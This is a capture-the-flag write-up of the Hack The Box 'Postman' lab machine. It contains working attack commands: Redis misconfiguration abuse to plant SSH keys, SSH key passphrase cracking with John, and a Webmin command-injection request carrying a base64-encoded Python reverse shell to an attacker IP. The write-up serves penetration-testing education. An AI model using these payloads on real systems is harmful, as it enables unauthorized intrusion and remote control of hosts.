[HTB] Postman — Write-up

Recon

Nmap

$ nmap -Pn --open -sC -sV -p- -T4 10.10.10.160

Initial Foothold

Redis (6379/TCP)

Redis Remote Command Execution (“RCE”)

### Creating SSH Keys
$ ssh-keygen -t rsa -C "bigb0ss@redis.io"
### Installing redis-tools
$ apt-get install redis-tools
### Creating the Public Key File
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt
### Writing the Public Key into Memory - redis-cli
$ redis-cli -h 10.10.10.160 flushall
$ cat ssh.txt | redis-cli -h 10.10.10.160 -x set crackit
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
10.10.10.160:6379> config set dir /var/lib/redis/.ssh/
10.10.10.160:6379> config set dbfilename "authorized_keys"
10.10.10.160:6379> save
### SSH (redis)
$ chmod 600 id_rsa
$ ssh -i id_rsa redis@10.10.10.160

User Shell (redis → Matt)

SSH Private Key Cracking — Matt

### ssh2john.py
$ python ssh2john.py id_rsa_matt > id_rsa_matt_john
### Cracking with John
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_matt_john
### OpenSSL
$ openssl rsa -in id_rsa_matt -out id_rsa_matt_decrypt
$ su Matt

Root Shell

Webmin — Matt Password Reuse

Root Exploit #1 — Manual Approach

### python_payload.txt
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.62",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
### Base64 Encoded Payload
$ cat python_payload.txt | base64 | tr -d '\r\n' && echo ''
cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTAuMTQuNjIiLDkwMDEpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOycK
### Burp Payload
mode=updates&search=&u=acl/apt&u=| echo -n "cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTAuMTQuNjIiLDkwMDEpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOycK"|base64 -d|bash;&ok=Update+Selected+Packages

Root Exploit #2 — Metasploit

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store